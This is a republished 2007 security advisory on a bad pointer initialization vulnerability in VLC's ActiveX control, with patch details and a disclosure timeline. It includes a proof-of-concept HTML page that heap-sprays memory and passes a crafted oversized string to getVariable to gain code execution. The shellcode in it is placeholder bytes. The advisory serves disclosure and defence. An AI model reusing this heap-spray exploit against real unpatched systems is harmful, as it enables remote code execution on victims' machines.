[NT] VLC ActiveX Bad Pointer Initialization Vulnerability



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



VLC ActiveX Bad Pointer Initialization Vulnerability
------------------------------------------------------------------------


SUMMARY

<http://www.videolan.org/> VLC player is "a popular multimedia player for
various audio and video formats, and various streaming protocols".

A vulnerability has been found in the ActiveX control DLL (axvlc.dll) used
by VLC player. This library contains three methods whose parameters are
not correctly checked, and may produce a bad initialized pointer. By
providing these functions specially crafted parameters, an attacker can
overwrite memory zones and execute arbitrary code.

DETAILS

Vulnerable Systems:
* VLC media player version 0.86, 0.86a, 0.86b and 0.86c

Immune Systems:
* VLC media player versions prior to 0.86
* VLC media player version 0.8.6d

The ActiveX control DLL (axvlc.dll) contains three methods whose
parameters are not correctly checked, and may produce a bad initialized
pointer. By providing these functions specially crafted parameters, an
attacker can overwrite memory zones and execute arbitrary code.

The vulnerable functions are:
Sub addTarget ( ByVal uri As String , ByVal options As Variant , ByVal
mode As VLCPlaylistMode , ByVal Position As Long) Function getVariable
(ByVal name As String) Sub setVariable ( ByVal name As String , ByVal
value As Variant)

The following assembly code is where the axvlc.dll library crashes. The
pointer that is read to be executed, can be overwritten, depending on how
the strings are sent. It also requires that previously other files are
loaded that left the pointer bad initialized, with the value that the
attacker needs to jump to his own code.
000113CD FF50 14 CALL DWORD PTR DS:[EAX+14]
000113D0 8B53 08 MOV EDX,DWORD PTR DS:[EBX+8]
000113D3 85D2 TEST EDX,EDX

The following is a PoC HTML file, using one of the vulnerable methods
(addTarget).
<head>
<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8' id='target'

</object>
</head>
<script>
var mm = null; if( target != null ) { var param1 =
unescape("%u0505%u0505");
var salame = "defaultV";
var salame2 = 1;
var salame3 = 0;
ag = unescape("%uCCCC%uCCCC");
sh = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%");
sz = sh.length * 2;
npsz = 0x400000 - (sz + 0x38);
nps = unescape("%u0505%u0505");
while(nps.length * 2 < npsz) nps += nps;
ihbc = (0x0E000000 - 0x400000) / 0x400000;
mm = new Array();
for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;
for(var i=0;i<2000;i++) param1 = param1 + unescape("%u0505%u0505");
target.getVariable (param1); }
</script>

Report Timeline:
* 2007-10-26: Core notifies the VLC team of the vulnerability.
* 2007-10-29: Technical details sent by Core to VLC.
* 2007-11-23: VLC notifies Core that a fix has been produced, and will be
released in VLC version 0.8.6d.
* 2007-11-30: VLC releases version 0.8.6d, which fixes this
vulnerability.
* 2007-12-03: CORE-2007-1004 advisory is published.

Solution:
VLC media player 0.8.6d adresses this issue and introduces further
usability fixes. Download it from the VideoLAN project website:
<http://www.videolan.org/> http://www.videolan.org/


ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@xxxxxxxxxxxxxxxx>
CORE Security Technologies Advisories.
The original article can be found at:
<http://www.coresecurity.com/?action=item&id=2035>
http://www.coresecurity.com/?action=item&id=2035



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [NT] Qbik WinGate Compressed Name Pointer DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Qbik WinGate Compressed Name Pointer DoS ... Remote exploitation of a denial of service vulnerability in Qbik IP ...
    (Securiteam)
  • [UNIX] Trend Micro VirusWall Buffer Overflow in VSAPI Library
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... buffer overflow vulnerability in VSAPI library allows arbitrary code ... is called "vscan" which is set suid root by default. ... permissions and thus granted all local users the privilege to execute the ...
    (Securiteam)
  • [UNIX] SCO Multiple Local Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Local exploitation of a buffer overflow vulnerability in the ppp binary, ... allows attackers to gain root privileges. ...
    (Securiteam)
  • [NT] Microsoft Word 6.0/95 Document Converter Buffer Overflow (MS04-041)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WordPad is "a word processing application that uses the MFC rich edit ... Remote exploitation of a buffer overflow vulnerability in Microsoft ... Microsoft Word format files into the Rich Text Format natively handled by ...
    (Securiteam)
  • [UNIX] Tikiwiki Command Injection and Arbitrary File Exposure Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Two security vulnerabilities have been recently discovered in Tikiwiki, ... Remote exploitation of an input validation vulnerability in Tikiwiki ... allows attackers to gain access to arbitrary files on the vulnerable ...
    (Securiteam)